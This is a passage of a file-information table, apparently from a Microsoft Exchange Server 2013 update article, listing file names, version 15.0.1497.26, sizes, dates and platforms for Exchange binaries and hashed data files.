\nExprfdll.dll| 15.0.1497.26| 25,008| 28-Oct-21| 19:31| x64| SP. \nExrpc32.dll| 15.0.1497.26| 1,683,368| 28-Oct-21| 19:29| x64| SP. \nExrw.dll| 15.0.1497.26| 28,064| 28-Oct-21| 19:31| x64| SP. \nExsetdata.dll| 15.0.1497.26| 1,749,928| 28-Oct-21| 19:31| x64| SP. \nExsetup.exe| 15.0.1497.26| 35,304| 28-Oct-21| 19:31| x86| SP. \nExsetupui.exe| 15.0.1497.26| 199,144| 28-Oct-21| 19:31| x86| SP. \nExtrace.dll| 15.0.1497.26| 210,352| 28-Oct-21| 19:31| x64| SP. \nExt_microsoft.exchange.data.transport.dll| 15.0.1497.26| 396,752| 28-Oct-21| 19:35| x86| SP. \nExwatson.dll| 15.0.1497.26| 19,368| 28-Oct-21| 19:31| x64| SP. \nFastioext.dll| 15.0.1497.26| 48,024| 28-Oct-21| 19:29| x64| SP. \nFil00a59b0bf9ad6dbefafaeb21bc52cadc| Not applicable| 160,921| 11-Sep-20| 0:09| Not applicable| SP. \nFil01265e3f95fffa90f103d6045ee1b646| Not applicable| 207,584| 11-Sep-20| 0:08| Not applicable| SP. \nFil01464b610a1b9ca44bfd4aa2b20a0a47| Not applicable| 242,360| 11-Sep-20| 0:08| Not applicable| SP. \nFil024514f3668d7fae2909c604a07f2cae| Not applicable| 118,512| 11-Sep-20| 0:09| Not applicable| SP. \nFil02886dbc65954c74ff5f004a4de087d0| Not applicable| 382,584| 11-Sep-20| 0:10| Not applicable| SP. \nFil02aa6af1a7515d4d79a36ff53c2451cc| Not applicable| 202,224| 11-Sep-20| 0:10| Not applicable| SP. \nFil03094a694b8e463b811188f1414aafd9| Not applicable| 1,562| 11-Sep-20| 0:10| Not applicable| SP. \nFil0346bb60fed433908e0d629870fa234f| Not applicable| 42,453| 11-Sep-20| 0:10| Not applicable| SP. \nFil03d6f5ce7cdbd650b4e31b9b17bfebdf| Not applicable| 63,034| 11-Sep-20| 0:09| Not applicable| SP. \nFil03df293f7a64512c7994f03b06b1cc9d| Not applicable| 122,028| 11-Sep-20| 0:08| Not applicable| SP. \nFil04648c9ff8319a4b2f4228ef41f3d558| Not applicable| 188,610| 11-Sep-20| 0:09| Not applicable| SP. \nFil04be20231e54d4b1b9ae0adcee287d33| Not applicable| 3,319| 11-Sep-20| 0:10| Not applicable| SP. \nFil05bd0d7761664f4f3447bc8b82cba551| Not applicable| 260,796| 11-Sep-20| 0:08| Not applicable| SP. \nFil07291eda8c3b4bef35c20b117bc4dc89| Not applicable| 11,065| 11-Sep-20| 0:03| Not applicable| SP. \nFil073611cea59a04ae5959ec5466f4f770| Not applicable| 206,119| 11-Sep-20| 0:10| Not applicable| SP. \nFil07a54aa7bb7bff7a7ebaa792bbf2dcc3| Not applicable| 12,920| 11-Sep-20| 0:10| Not applicable| SP. \nFil07d1178f9b4ec96c22a8240722e0bf9f| Not applicable| 381,584| 11-Sep-20| 0:09| Not applicable| SP. \nFil0807d7ff1190d89482f9590435e63704| Not applicable| 376,675| 11-Sep-20| 0:09| Not applicable| SP. \nFil08a4c36edaa0a358721425799ae714fa| Not applicable| 243,898| 11-Sep-20| 0:08| Not applicable| SP. \nFil092fbdf7953d47bcaec4c494ad2a4620| Not applicable| 142,751| 11-Sep-20| 0:11| Not applicable| SP. \nFil093c3f7e3d75f52ac3ae90f8d5c582cc| Not applicable| 229,663| 11-Sep-20| 0:08| Not applicable| SP. \nFil095e2ae2aad7e5fe67147fa275cf3657| Not applicable| 200,119| 11-Sep-20| 0:09| Not applicable| SP. \nFil097d6a2a5acff36af3b3de457fece43f| Not applicable| 317,272| 11-Sep-20| 0:08| Not applicable| SP. \nFil098cd77950ecc93e59a6d478029be507| Not applicable| 2,003,210| 11-Sep-20| 0:06| Not applicable| SP. \nFil0994fb28dc0ef8f87218c621ae86e134| Not applicable| 286,293| 11-Sep-20| 0:11| Not applicable| SP. \nFil0aff9b8e03ff8a9bb1517388f2c44d1a| Not applicable| 14,524| 11-Sep-20| 0:10| Not applicable| SP. \nFil0bfa47954dd042005e90c2bd01cd0a37| Not applicable| 142,850| 11-Sep-20| 0:08| Not applicable| SP. \nFil0d721f7ce4137c3bd63bdc89da0bb5cb| Not applicable| 236,086| 11-Sep-20| 0:08| Not applicable| SP. \nFil0dbb9c355360df6a4459d2007004c9e3| Not applicable| 208,728| 11-Sep-20| 0:10| Not applicable| SP. \nFil0dcd409d2cf1a0fe1b1d23995972047e| Not applicable| 264,787| 11-Sep-20| 0:09| Not applicable| SP. \nFil0dd00b83250a9921930f80dfadd64420| Not applicable| 167,266| 11-Sep-20| 0:10| Not applicable| SP. \nFil0ee631acb4cbeba6a8ce8838790ffba3| Not applicable| 225,959| 11-Sep-20| 0:08| Not applicable| SP. \nFil0fe6c543ad5dce68f8da1d128ebff332| Not applicable| 303,122| 11-Sep-20| 0:10| Not applicable| SP. \nFil0fefc0bb7650de7a8e100f27290b316c| Not applicable| 939| 11-Sep-20| 0:10| Not applicable| SP. \nFil1049e7dbf56476ddca7fbcdd54f1b796| Not applicable| 146,378| 11-Sep-20| 0:10| Not applicable| SP. \nFil11364618faea90d632e254088444fc52| Not applicable| 3,359| 11-Sep-20| 0:10| Not applicable| SP. \nFil1173f6b39fe7c9d910b8dc5bd19521f8| Not applicable| 361,118| 11-Sep-20| 0:09| Not applicable| SP. \nFil119e3a5d3db8bc97fc7e5f8e81f2f8ca| Not applicable| 197,448| 11-Sep-20| 0:08| Not applicable| SP. \nFil1270dc39571f9c7aa6cfaadeff4f3640| Not applicable| 171,559| 11-Sep-20| 0:07| Not applicable| SP. \nFil129c1192b00260084863bfb442d9ef93| Not applicable| 1,303| 11-Sep-20| 0:10| Not applicable| SP. \nFil13fb2417bf46b85b2993d051b8ab7c66| Not applicable| 330,130| 11-Sep-20| 0:08| Not applicable| SP. \nFil1426532f337ffd248ad8526e66f9fed6| Not applicable| 147,629| 11-Sep-20| 0:09| Not applicable| SP. \nFil1591caf2c0ed95d3d7dc675a20701ee6| Not applicable| 114,064| 11-Sep-20| 0:08| Not applicable| SP. \nFil15f38a12988013e8d68ce239be0d5f3d| Not applicable| 171,283| 11-Sep-20| 0:08| Not applicable| SP. \nFil162350ffb26be403359faaf6c45406cf| Not applicable| 163,899| 11-Sep-20| 0:08| Not applicable| SP. \nFil162b0371ffc6ab85232d5f1c2f4997e7| Not applicable| 9,782| 11-Sep-20| 0:10| Not applicable| SP. \nFil1696980eba48067e2ae900f45faad78e| Not applicable| 1,875| 11-Sep-20| 0:10| Not applicable| SP. \nFil16fca2f0aaead1fbec7a463ca606a1ec| Not applicable| 370,126| 11-Sep-20| 0:08| Not applicable| SP. \nFil19183400565ab2ccc44ecaa477a5e3d1| Not applicable| 15,230| 11-Sep-20| 0:03| Not applicable| SP. \nFil199e6bdb4f3b2b47c763319633da1136| Not applicable| 327,350| 11-Sep-20| 0:08| Not applicable| SP. \nFil19ccdd118db9bfc3475814a4b4e08c08| Not applicable| 584,377| 11-Sep-20| 0:08| Not applicable| SP. \nFil1a3b1da5816e3bb64056cf149788066b| Not applicable| 480,547| 11-Sep-20| 0:10| Not applicable| SP. \nFil1ac6267c3eb50d8e405d35e06e7c7878| Not applicable| 15,933| 11-Sep-20| 0:10| Not applicable| SP. \nFil1b70faaee4a16f481d3565f701d210d2| Not applicable| 194,186| 11-Sep-20| 0:10| Not applicable| SP. \nFil1bb83920715900f568a44fea64ebdf14| Not applicable| 409,070| 11-Sep-20| 0:10| Not applicable| SP. \nFil1bbf3e38efe960ca2113daaab481b364| Not applicable| 3,474| 11-Sep-20| 0:10| Not applicable| SP. \nFil1e3e47d491e73bf0ce9bd6368a869661| Not applicable| 114,721| 11-Sep-20| 0:09| Not applicable| SP. \nFil1ebaeefd7727d6252ca22a5e152fc343| Not applicable| 8,138| 11-Sep-20| 0:10| Not applicable| SP. \nFil1f3158c2364004336fefd7fa8c62086b| Not applicable| 327,640| 11-Sep-20| 0:09| Not applicable| SP. \nFil1f475a8603a1bbd01e1a40d53c813c9c| Not applicable| 315,635| 11-Sep-20| 0:10| Not applicable| SP. \nFil1fff4b705c9647b4ff3f83b020b2e237| Not applicable| 370,164| 11-Sep-20| 0:10| Not applicable| SP. \nFil2039f6f47019d7eb8d50a7d7387e1326| Not applicable| 118,107| 11-Sep-20| 0:10| Not applicable| SP. \nFil208b9e5328593cd0b5013b4cae2713f9| Not applicable| 335,423| 11-Sep-20| 0:08| Not applicable| SP. \nFil2093384b2fd2dd4694e4452e9aacfc18| Not applicable| 383,683| 11-Sep-20| 0:07| Not applicable| SP. \nFil20b9a11913964b245854e564a94544ed| Not applicable| 144,647| 11-Sep-20| 0:08| Not applicable| SP. \nFil20e584fabe14655761b29e602eed5cc9| Not applicable| 182,170| 11-Sep-20| 0:07| Not applicable| SP. \nFil2143e07c2cac620dfefafd058902b0d3| Not applicable| 2,915| 11-Sep-20| 0:10| Not applicable| SP. \nFil222a09c547b07ae712f31cf9175a5717| Not applicable| 116,530| 11-Sep-20| 0:08| Not applicable| SP. \nFil2294c86871eb9882419d11de13a0e558| Not applicable| 866| 11-Sep-20| 0:10| Not applicable| SP. \nFil2294eb56822388c24312aee15bef4d72| Not applicable| 3,423| 11-Sep-20| 0:10| Not applicable| SP. \nFil235c6fa467f8662a9bcbd6fac8df465b| Not applicable| 117,287| 11-Sep-20| 0:07| Not applicable| SP. \nFil240bcf2747ef1821d63068b04d54a07d| Not applicable| 163,794| 11-Sep-20| 0:11| Not applicable| SP. \nFil24622e71b4f201522c30b5396079ebf9| Not applicable| 151,701| 11-Sep-20| 0:08| Not applicable| SP. \nFil247b22302db2287f03bd385ba61ffe55| Not applicable| 398,137| 11-Sep-20| 0:07| Not applicable| SP. \nFil25727a6a764ebd6cd89550c2c031c37c| Not applicable| 160,115| 11-Sep-20| 0:08| Not applicable| SP. \nFil265b8ec6d4ed498b5382cfc1027491a2| Not applicable| 82,741| 11-Sep-20| 0:09| Not applicable| SP. \nFil280c8cbd4386b442b5c94af6708eaac8| Not applicable| 16,625| 11-Sep-20| 0:10| Not applicable| SP. \nFil283358d58bb98df0557b67b6f747c86a| Not applicable| 460,146| 11-Sep-20| 0:07| Not applicable| SP. \nFil28b2b9d1b7e313e502a8835045c2d0d0| Not applicable| 15,031| 11-Sep-20| 0:10| Not applicable| SP. \nFil2a6b0663833d438eea50ffe81c51ec83| Not applicable| 2,003,228| 11-Sep-20| 0:05| Not applicable| SP. \nFil2adab262add65203b0c7c5bc1251e47f| Not applicable| 312,638| 11-Sep-20| 0:08| Not applicable| SP. \nFil2b2ac38f6e7b4a0553da72f403582cd5| Not applicable| 1,727| 11-Sep-20| 0:10| Not applicable| SP. \nFil2bd8c15c9164155f212951a70631823f| Not applicable| 5,285| 11-Sep-20| 0:10| Not applicable| SP. \nFil2c21ffd8eb5ecd0f7c89a27b86951a7d| Not applicable| 10,821| 11-Sep-20| 0:09| Not applicable| SP. \nFil2db733aabd2264a64057e89820aca13c| Not applicable| 13,759| 11-Sep-20| 0:10| Not applicable| SP. \nFil2e63bcb4a6d04e10c147a6c3f92bfcab| Not applicable| 670,945| 11-Sep-20| 0:09| Not applicable| SP. \nFil2e6b2f8c3954b6bbc8ab2a22d1438d67| Not applicable| 114,990| 11-Sep-20| 0:09| Not applicable| SP. \nFil2eba4c3b1398dc2169d3a58cf26d7494| Not applicable| 3,169| 11-Sep-20| 0:10| Not applicable| SP. \nFil2f58bbe281f35794e1fadfd2d5372340| Not applicable| 151,951| 11-Sep-20| 0:09| Not applicable| SP. \nFil31e9f5684b0b5ea70746907556f64515| Not applicable| 296,876| 11-Sep-20| 0:09| Not applicable| SP. \nFil32c87816f9a713092dc110787ef42586| Not applicable| 35,050| 11-Sep-20| 0:08| Not applicable| SP. \nFil32ede05fb6827d1a783e56be2937e471| Not applicable| 153,091| 11-Sep-20| 0:08| Not applicable| SP. \nFil344d9c6f4f02142eba8c624f965acd67| Not applicable| 121,941| 11-Sep-20| 0:08| Not applicable| SP. \nFil363d000c227039f27c69b128287ff68e| Not applicable| 186,041| 11-Sep-20| 0:07| Not applicable| SP. \nFil36da999539f10f4939d3c19fb7e77d53| Not applicable| 11,324| 11-Sep-20| 0:09| Not applicable| SP. \nFil37589a1bee605be2ae1422c6d19521cd| Not applicable| 384,396| 11-Sep-20| 0:09| Not applicable| SP. \nFil3804327ae3bca4c1a589eed2acaf0909| Not applicable| 1,739| 11-Sep-20| 0:10| Not applicable| SP. \nFil38494a0e60def94d88e8724029463551| Not applicable| 83,497| 11-Sep-20| 0:07| Not applicable| SP. \nFil3859e6d9c6cf748d05be23536b9221c4| Not applicable| 124,060| 11-Sep-20| 0:10| Not applicable| SP. \nFil39ee1f35ad97bd462c3ac5aec000a1c0| Not applicable| 210,413| 11-Sep-20| 0:10| Not applicable| SP. \nFil3a42ef50a1ae3edbb7a00bc22f3434e3| Not applicable| 24,337| 11-Sep-20| 0:03| Not applicable| SP. \nFil3b12709b2a6d1f6a5a9d96edbc2a9dd2| Not applicable| 211,288| 11-Sep-20| 0:09| Not applicable| SP. \nFil3b8cc2b36f720baad95be0910e9346eb| Not applicable| 154,799| 11-Sep-20| 0:10| Not applicable| SP. \nFil3c3fb88b0193db7b45726833c054d1ed| Not applicable| 4,920| 11-Sep-20| 0:10| Not applicable| SP. \nFil3cccb1e1cc9707666a7232847b28158a| Not applicable| 148,810| 11-Sep-20| 0:10| Not applicable| SP. \nFil3d3af8f03141aadd16d3951f471e4ecd| Not applicable| 472,586| 11-Sep-20| 0:10| Not applicable| SP. \nFil3d952efb9613d0f0fa9c884c2e197c47| Not applicable| 64,742| 11-Sep-20| 0:07| Not applicable| SP. \nFil3d96340571dcbbca40f9dda36cf8cc23| Not applicable| 376,491| 11-Sep-20| 0:08| Not applicable| SP. \nFil3db21a7c265bee0f8897197ab8184cbb| Not applicable| 407,449| 11-Sep-20| 0:11| Not applicable| SP. \nFil3e7cd5352ab27351d37dc5a0d70eb5da| Not applicable| 8,202| 11-Sep-20| 0:10| Not applicable| SP. \nFil401dc81859f7ddf0518e04d60fb6f0f0| Not applicable| 127,242| 11-Sep-20| 0:08| Not applicable| SP. \nFil4032894f9d18775fe5b8f517b9446ed2| Not applicable| 247,259| 11-Sep-20| 0:09| Not applicable| SP. \nFil426e71bd7d39fbdac2f9aac2641b16f3| Not applicable| 1,923| 11-Sep-20| 0:10| Not applicable| SP. \nFil4278d1df336a84435b4ce9034fb1a172| Not applicable| 718| 11-Sep-20| 0:10| Not applicable| SP. \nFil42a5edd14a3d3f555fcd6172e48921fb| Not applicable| 157,961| 11-Sep-20| 0:09| Not applicable| SP. \nFil42c22971f1d5dc2196265e92d6da872f| Not applicable| 150,392| 11-Sep-20| 0:11| Not applicable| SP. \nFil442f08df8632cfa5f8638445f7151f04| Not applicable| 956| 11-Sep-20| 0:10| Not applicable| SP. \nFil449a3b586a9163232e7d21b204dff9e2| Not applicable| 1,316| 11-Sep-20| 0:10| Not applicable| SP. \nFil44a698d38545e9cd051d9db8fdfc900e| Not applicable| 225,606| 11-Sep-20| 0:10| Not applicable| SP. \nFil44afe89b21b16bf4b609ab451085526a| Not applicable| 373,865| 11-Sep-20| 0:08| Not applicable| SP. \nFil44d189470b9393ed19ca08defd240a38| Not applicable| 216,698| 11-Sep-20| 0:10| Not applicable| SP. \nFil45cd37ad6b0169d99d0eb6dcba7d08d9| Not applicable| 166,781| 11-Sep-20| 0:10| Not applicable| SP. \nFil46233812dcee5af00423b2fc332d0c5d| Not applicable| 2,015,045| 11-Sep-20| 0:05| Not applicable| SP. \nFil46ef8081ccac6e0c239c52cfc8c58dcf| Not applicable| 4,743| 11-Sep-20| 0:07| Not applicable| SP. \nFil476b430823a50cf77d9968f03858d69d| Not applicable| 359,078| 11-Sep-20| 0:08| Not applicable| SP. \nFil481ea15e0071beee36e6711fe55c7372| Not applicable| 307,725| 11-Sep-20| 0:08| Not applicable| SP. \nFil4a3306ef5eda0d022a521f8bd6c3d940| Not applicable| 158,115| 11-Sep-20| 0:08| Not applicable| SP. \nFil4a79082a6a63aa24efbd3f71b1a9f8e8| Not applicable| 139,064| 11-Sep-20| 0:09| Not applicable| SP. \nFil4aa30f91267dc1dffacc9bb3f9e43367| Not applicable| 1,972| 11-Sep-20| 0:10| Not applicable| SP. \nFil4b622a1d73e8a02febd3ad6f59e8b98c| Not applicable| 12,107| 11-Sep-20| 0:10| Not applicable| SP. \nFil4bc634eae6f3c142c6ed8d2927520cc3| Not applicable| 5,653| 11-Sep-20| 0:10| Not applicable| SP. \nFil4bd7eb36b7c3567f715d5365f8047204| Not applicable| 142,286| 11-Sep-20| 0:10| Not applicable| SP. \nFil4c0ab8720533c89e68ce63e86d429dde| Not applicable| 381,163| 11-Sep-20| 0:08| Not applicable| SP. \nFil4c177d04b538b102de0bc7af504ade88| Not applicable| 1,264| 11-Sep-20| 0:10| Not applicable| SP. \nFil4cc43ed047118c3c70489c99f391ad41| Not applicable| 570,339| 11-Sep-20| 0:08| Not applicable| SP. \nFil4cfa7a61721252f62fb29a0f1805bd48| Not applicable| 151,467| 11-Sep-20| 0:09| Not applicable| SP. \nFil4d0f14d8c2b6b77898bcc5954a8335d4| Not applicable| 12,161| 11-Sep-20| 0:10| Not applicable| SP. \nFil4d393ab247c2ec19d982c087d694252e| Not applicable| 485,168| 11-Sep-20| 0:09| Not applicable| SP. \nFil4e4dfdf527ace3b42d88eaea58ad4e00| Not applicable| 110,057| 11-Sep-20| 0:11| Not applicable| SP. \nFil4f050d584b052cef56c611c7a6fc0b4d| Not applicable| 440,314| 11-Sep-20| 0:10| Not applicable| SP. \nFil4f0ff802c3382fc6cb28e90145915a91| Not applicable| 155,232| 11-Sep-20| 0:08| Not applicable| SP. \nFil4fbdcc69c6687636e427226aab76d82c| Not applicable| 165,120| 11-Sep-20| 0:08| Not applicable| SP. \nFil50c8b757b4933533069fdb8f6b905e0d| Not applicable| 158,190| 11-Sep-20| 0:09| Not applicable| SP. \nFil50e303dde9fe96807796a25979e2814a| Not applicable| 252,966| 11-Sep-20| 0:08| Not applicable| SP. \nFil538089ef224df4976d311e8302364c00| Not applicable| 1,152,608| 11-Sep-20| 0:12| Not applicable| SP. \nFil5387207480a1873bc7ed50c9eaed89c7| Not applicable| 2,003,225| 11-Sep-20| 0:06| Not applicable| SP. \nFil53acea05108c4f46ff21c66f40cfaeec| Not applicable| 150,387| 11-Sep-20| 0:08| Not applicable| SP. \nFil540e2d0af94e0e486cae7a4a9e109676| Not applicable| 215,778| 11-Sep-20| 0:10| Not applicable| SP. \nFil541882cdf469df98dbf0ac462de46344| Not applicable| 575,597| 11-Sep-20| 0:09| Not applicable| SP. \nFil543079c26bd28998e4563bbd4cac1644| Not applicable| 4,186| 11-Sep-20| 0:10| Not applicable| SP. \nFil54337210b89f5380a40a0904d6d860f8| Not applicable| 1,729| 11-Sep-20| 0:10| Not applicable| SP. \nFil5542b08a74ea880a5f2bd8b269fc1231| Not applicable| 250,545| 11-Sep-20| 0:09| Not applicable| SP. \nFil57beb556aec2d6e97c7b317de9f72304| Not applicable| 322,662| 11-Sep-20| 0:08| Not applicable| SP. \nFil57fcce90719eee5eff1f954327649e53| Not applicable| 222,952| 11-Sep-20| 0:08| Not applicable| SP. \nFil58337dc668f3e1a94ebd035dc310ef3a| Not applicable| 3,653| 11-Sep-20| 0:10| Not applicable| SP. \nFil59074b5deefeb2b4d32b58953cb77f9e| Not applicable| 202,678| 11-Sep-20| 0:07| Not applicable| SP. \nFil596d2b532682a216aced5af81a34785e| Not applicable| 371,817| 11-Sep-20| 0:08| Not applicable| SP. \nFil5aef2df4d623713792ff2e54a0abea77| Not applicable| 3,391| 11-Sep-20| 0:10| Not applicable| SP. \nFil5b481af97947b02636fefbad6cf5332e| Not applicable| 10,504| 11-Sep-20| 0:10| Not applicable| SP. \nFil5b51bde4cf501f9d89d6fdd6084fb0dc| Not applicable| 76,238| 11-Sep-20| 0:07| Not applicable| SP. \nFil5c8127dbccdda444e35671ff4a274fc5| Not applicable| 164,462| 11-Sep-20| 0:08| Not applicable| SP. \nFil5cd88aaf0a21ddb716f1da478f29fe22| Not applicable| 68,607| 11-Sep-20| 0:03| Not applicable| SP. \nFil5d2722dc3289787a79451240b7a88ef3| Not applicable| 1,218| 11-Sep-20| 0:10| Not applicable| SP. \nFil5d6827cff217e4dfce3affa1aa55d8f3| Not applicable| 476,341| 11-Sep-20| 0:09| Not applicable| SP. \nFil5e56ac7a5a17eeba25534e146a5b96c5| Not applicable| 187,286| 11-Sep-20| 0:10| Not applicable| SP. \nFil5f4f6a29ca46dc40a4f6ac9b8b772ce3| Not applicable| 203,484| 11-Sep-20| 0:09| Not applicable| SP. \nFil5fd4bc51ae2ad462403cdc6a0cf9ffd0| Not applicable| 311,764| 11-Sep-20| 0:10| Not applicable| SP. \nFil604f37df9e3b6c4d7c48f14c35a26977| Not applicable| 126,177| 11-Sep-20| 0:08| Not applicable| SP. \nFil610677a0034b8232f2b460d83c22ce46| Not applicable| 481,442| 11-Sep-20| 0:09| Not applicable| SP. \nFil6133c70794989aad906ec1c690498770| Not applicable| 1,669| 11-Sep-20| 0:10| Not applicable| SP. \nFil63179e1cb286b0ef11dc63dc6af82432| Not applicable| 14,116| 11-Sep-20| 0:10| Not applicable| SP. \nFil6356fbacb88d6b1b13e09aadb6887fbe| Not applicable| 161,576| 11-Sep-20| 0:10| Not applicable| SP. \nFil64dd0c27769e484c139e2503ec3eef51| Not applicable| 218,860| 11-Sep-20| 0:10| Not applicable| SP. \nFil65080648928ede60012994a0baeca00b| Not applicable| 309,691| 11-Sep-20| 0:09| Not applicable| SP. \nFil6ad129a5d744ab89f7b431d1d495262a| Not applicable| 60,605| 11-Sep-20| 0:08| Not applicable| SP. \nFil6ae5c571deb81c557347776937eec424| Not applicable| 327,120| 11-Sep-20| 0:08| Not applicable| SP. \nFil6c511826bfeecb77f6559c6b60d65511| Not applicable| 360,888| 11-Sep-20| 0:09| Not applicable| SP. \nFil6c6539569c8b5a20bd7f4dc318576341| Not applicable| 305,628| 11-Sep-20| 0:09| Not applicable| SP. \nFil6d0c3c83a060d3235e4a034bf754cdde| Not applicable| 139,720| 11-Sep-20| 0:09| Not applicable| SP. \nFil6ec9b1a61bc1b1de3666c8f074b638b0| Not applicable| #########| 11-Sep-20| 0:12| Not applicable| SP. \nFil6f8d2fab306d136e7656db49710c3a48| Not applicable| 3,636| 11-Sep-20| 0:10| Not applicable| SP. \nFil6fe7b10d2287827cf3c81b58b9c8b8ff| Not applicable| 304,524| 11-Sep-20| 0:10| Not applicable| SP. \nFil7189adae9ca485f37c0c74269ff71aca| Not applicable| 12,644| 11-Sep-20| 0:10| Not applicable| SP. \nFil71e73a51dc2a21736116b8807bb466e8| Not applicable| 156,649| 11-Sep-20| 0:09| Not applicable| SP. \nFil7207154834a23fbc29d011e71d208a39| Not applicable| 163,997| 11-Sep-20| 0:10| Not applicable| SP. \nFil720fe9713dec6be87ee03bce38fbfc36| Not applicable| 321,069| 11-Sep-20| 0:08| Not applicable| SP. \nFil7332c61fe6101e9bae82c487d99082df| Not applicable| 916| 11-Sep-20| 0:10| Not applicable| SP. \nFil736e7b808675fe35044733ce258a9a73| Not applicable| 209,717| 11-Sep-20| 0:09| Not applicable| SP. \nFil73c9286d8470aa113cba01507403eeba| Not applicable| 123,453| 11-Sep-20| 0:10| Not applicable| SP. \nFil73dbdc432c5bb5f29330a83a9faa7ae1| Not applicable| 319,119| 11-Sep-20| 0:10| Not applicable| SP. \nFil74f06c9b75edb14687c2262ad6ae2557| Not applicable| 310,368| 11-Sep-20| 0:08| Not applicable| SP. \nFil7511efbde449570e1079881ef478d89f| Not applicable| 328,987| 11-Sep-20| 0:10| Not applicable| SP. \nFil75c2cda8a128e765ff0af0755bfd328b| Not applicable| 145,359| 11-Sep-20| 0:09| Not applicable| SP. \nFil7622d867b4e32c321108f9585ae213e0| Not applicable| 143,754| 11-Sep-20| 0:10| Not applicable| SP. \nFil764919a245fe2bc500925814cddfbdad| Not applicable| 72,860| 11-Sep-20| 0:03| Not applicable| SP. \nFil76a84f20ffd55d7ea12ac35d8380efd5| Not applicable| 425,083| 11-Sep-20| 0:10| Not applicable| SP. \nFil7700cf10ad703df7c8918a0563a5e129| Not applicable| 170,409| 11-Sep-20| 0:10| Not applicable| SP. \nFil780df069c247b8094634ab0404623781| Not applicable| 3,146| 11-Sep-20| 0:10| Not applicable| SP. \nFil78360aa0f236f838f94a573fa0e591eb| Not applicable| 306,391| 11-Sep-20| 0:10| Not applicable| SP. \nFil788ad7e3f4abc8bfb4327d0b98934699| Not applicable| 3,264| 11-Sep-20| 0:10| Not applicable| SP. \nFil789b96ff5e7f5c36651793db27c8b262| Not applicable| 156,482| 11-Sep-20| 0:10| Not applicable| SP. \nFil7975d5410f26d07f08de47940983d903| Not applicable| 11,720| 11-Sep-20| 0:10| Not applicable| SP. \nFil798d3f63fe34287c86fffb74428a321a| Not applicable| 298,444| 11-Sep-20| 0:11| Not applicable| SP. \nFil79b13a2c33d13735946561479fc859fa| Not applicable| 133,726| 11-Sep-20| 0:11| Not applicable| SP. \nFil79c7a259268acf783baef95ca5b23ec1| Not applicable| 152,767| 11-Sep-20| 0:07| Not applicable| SP. \nFil7a2063c960c5cb61395e7839f1297cb5| Not applicable| 4,115| 11-Sep-20| 0:10| Not applicable| SP. \nFil7a403fcd3c2773230c350d8e1d3cebf7| Not applicable| 104,032| 11-Sep-20| 0:03| Not applicable| SP. \nFil7a9f06943db3abcb09bf15ae13ff2cd2| Not applicable| 137,922| 11-Sep-20| 0:08| Not applicable| SP. \nFil7b670339ef54eea40a7516c12d2f0e92| Not applicable| 486,258| 11-Sep-20| 0:08| Not applicable| SP. \nFil7b9dcb919f1fd2e3a1f6f379fbfaeef0| Not applicable| 165,327| 11-Sep-20| 0:09| Not applicable| SP. \nFil7bc288d1803d8c01d917d4ae3424dd04| Not applicable| 371,056| 11-Sep-20| 0:10| Not applicable| SP. \nFil7be03a57aa609693fcd744981699f067| Not applicable| 214,670| 11-Sep-20| 0:10| Not applicable| SP. \nFil7cd60b323924095924a33c83b8160967| Not applicable| 515,462| 11-Sep-20| 0:08| Not applicable| SP. \nFil7cddc3f217fc9bd77c3335a3bbe74040| Not applicable| 316,645| 11-Sep-20| 0:10| Not applicable| SP. \nFil7d3d44cb179d947736c393335bc1d8a5| Not applicable| 323,379| 11-Sep-20| 0:08| Not applicable| SP. \nFil7e1364e8b092a71503bb6ab4c0c8d043| Not applicable| 317,812| 11-Sep-20| 0:10| Not applicable| SP. \nFil7f88ed25a2323690ef4603fcd5965e29| Not applicable| 146,052| 11-Sep-20| 0:08| Not applicable| SP. \nFil7fc67e0ea132a46fa0c81ae793c6fafb| Not applicable| 1,751| 11-Sep-20| 0:10| Not applicable| SP. \nFil7ffa598af3dc4eba6484cfca34eff091| Not applicable| 487,790| 11-Sep-20| 0:10| Not applicable| SP. \nFil7fffbc3b910469a09b1d0670696bd038| Not applicable| 298,276| 11-Sep-20| 0:09| Not applicable| SP. \nFil802e831d6cd841b23e31f3ede7146efa| Not applicable| 160,374| 11-Sep-20| 0:09| Not applicable| SP. \nFil8032f47eeca48977d2f693f7644627ce| Not applicable| 123,440| 11-Sep-20| 0:08| Not applicable| SP. \nFil809e41480ae24ce8f65630fb91e72e3e| Not applicable| 191,320| 11-Sep-20| 0:10| Not applicable| SP. \nFil819cef16705be45debd0be4d68755dbb| Not applicable| 22,679| 11-Sep-20| 0:10| Not applicable| SP. \nFil819e4ee2c73b6dac7c9b217a2edccf64| Not applicable| 10,875| 11-Sep-20| 0:10| Not applicable| SP. \nFil81c79182b21820eb762d4cc2ac59769f| Not applicable| 165,056| 11-Sep-20| 0:08| Not applicable| SP. \nFil828666eab0d3bdc61f9fe757bd60e3a2| Not applicable| 375,074| 11-Sep-20| 0:09| Not applicable| SP. \nFil832eb962b387b4e7631ffa4158cb28cc| Not applicable| 14,837| 11-Sep-20| 0:10| Not applicable| SP. \nFil851524c7c4958c3155502d781c920d9b| Not applicable| 81,295| 11-Sep-20| 0:10| Not applicable| SP. \nFil86eb489656c398a89c25641e80f48303| Not applicable| 121,319| 11-Sep-20| 0:09| Not applicable| SP. \nFil86fd0667d62cefa2ae6e49f317434bd6| Not applicable| 384,644| 11-Sep-20| 0:08| Not applicable| SP. \nFil88ec4eef108486342f6b6921bccaea93| Not applicable| 943,740| 11-Sep-20| 0:12| Not applicable| SP. \nFil89331bf5c45adb0d8a8ea178cc079709| Not applicable| 300,269| 11-Sep-20| 0:08| Not applicable| SP. \nFil8a10c1556c031a0905905396871c93f7| Not applicable| 310,330| 11-Sep-20| 0:09| Not applicable| SP. \nFil8b153dea503da810e5e578642a5c28fe| Not applicable| 3,822| 11-Sep-20| 0:10| Not applicable| SP. \nFil8c35bfdd38d7db1a373ae3b3a87a84b5| Not applicable| 164,030| 11-Sep-20| 0:09| Not applicable| SP. \nFil8cbd0cddb9a1705309ebeabfe75fe38a| Not applicable| 319,024| 11-Sep-20| 0:08| Not applicable| SP. \nFil8dc3b8e19a7e2e60f48bf22687139503| Not applicable| 3,314| 11-Sep-20| 0:10| Not applicable| SP. \nFil8e9637e486491d4df1ea670c5b33eb16| Not applicable| 3,600| 11-Sep-20| 0:10| Not applicable| SP. \nFil9007d7a068a4430d0ebefa4b039db1b4| Not applicable| 162,200| 11-Sep-20| 0:10| Not applicable| SP. \nFil9032e5295c43ed35e2cd2820ebd6af91| Not applicable| 308,546| 11-Sep-20| 0:08| Not applicable| SP. \nFil9050234bc32f4d53dcf496a54c13c1f0| Not applicable| 362,146| 11-Sep-20| 0:09| Not applicable| SP. 